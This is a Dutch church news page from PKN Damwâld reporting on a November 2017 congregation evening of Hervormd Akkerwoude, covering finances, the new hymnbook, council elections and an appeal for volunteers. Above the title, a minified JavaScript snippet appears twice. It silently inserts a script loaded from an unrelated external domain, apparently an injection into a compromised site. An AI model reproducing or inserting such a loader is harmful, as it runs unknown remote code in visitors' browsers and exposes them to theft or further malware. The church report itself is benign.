;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Constructieve gemeenteavond Hervormd Akkerwoude c.a. - PKN Damwâld

Constructieve gemeenteavond Hervormd Akkerwoude c.a.

Gepubliceerd op: woensdag 22 november 2017

Bezinning verdieping, ontspanning, ontmoeting … de gemeenteavond op dinsdag 21 november in’t Skûlplak bleek bij uitstek een prima gelegenheid te zijn om met elkaar in gesprek te gaan over het reilen en zeilen in onze gemeente. De talrijk aanwezige gemeenteleden werden door de kerkenraad op een vlotte wijze op de hoogte gebracht over de (financiële-) handel en wandel van onze gemeente en ‘getrakteerd’ op een interessante presentatie van organist Tim van der Weide over het nieuwe Liedboek. Uiteraard werd er gesproken over het beleid van de kerkenraad en de toekomst van de gemeente. Geloven doe je niet alleen, maar ook samen. In de ontmoeting delen wij met elkaar wat ons beweegt in God, Jezus, Geest en mensen. Zo verrijken we elkaar en verbinden we ons met elkaar, maar ook met de mensen om ons heen. Wat willen wij vinden in onze kerk, wat zoeken wij in deze snel veranderende en lastige tijd? Kan de kerk in deze tijd nog wel iets betekenen voor ons? Een helder en goed functionerend bestuursstructuur, een moedig financieel beleid en beschikbare, competente vrijwilligers zijn daarbij natuurlijk ook van onmisbaar belang. Vandaaruit werd dan ook de stand van zaken rond de ‘bemensing’ van de kerkenraad besproken. Een gemengd gevoel! Enerzijds verheugend is het dat een behoorlijk aantal kandidaten zich beschikbaar stelden voor aanvaarding van een functie binnen de kerkenraad. Alle kandidaten werden met grote instemming van de gemeente ver- en herkozen tot kerkenraadslid, waarmee weer een behoorlijk aantal vacatures zijn ingevuld. Anderzijds … we weten het allemaal: we zijn met elkaar de kerk. Als kerk, als gemeente zijn we een actieve en warme geloofsgemeenschap. Maar die gemeenschap kan alleen functioneren als er genoeg vrijwilligers en ambtsdragers zijn. Voor de kerkenraad hebben we een aantal vacatures ingevuld, maar we zoeken nog een groot aantal diakenen en (jeugd-) ouderlingen. Diaconale en pastorale (jeugd-) zorg is een belangrijk onderdeel van ons kerk zijn, het is belangrijk dat dat werk doorgaat. Het is ons aller verantwoordelijkheid om het kerkenwerk te laten doorgaan. Er zijn veel redenen te bedenken om deze stap niet te zetten, maar er zijn meer argumenten om dat wel te doen. U zult ervaren dat het kerkenwerk ook heel veel plezier en voldoening geeft. Van harte hopen we dat wij binnenkort als kerkenraad ‘op volle sterkte’ mogen zijn ! Samen mogen we met de door Hem gegeven gaven werkzaam zijn in de wijngaard, tot grootmaking van Zijn Naam en tot opbouw van Zijn gemeente.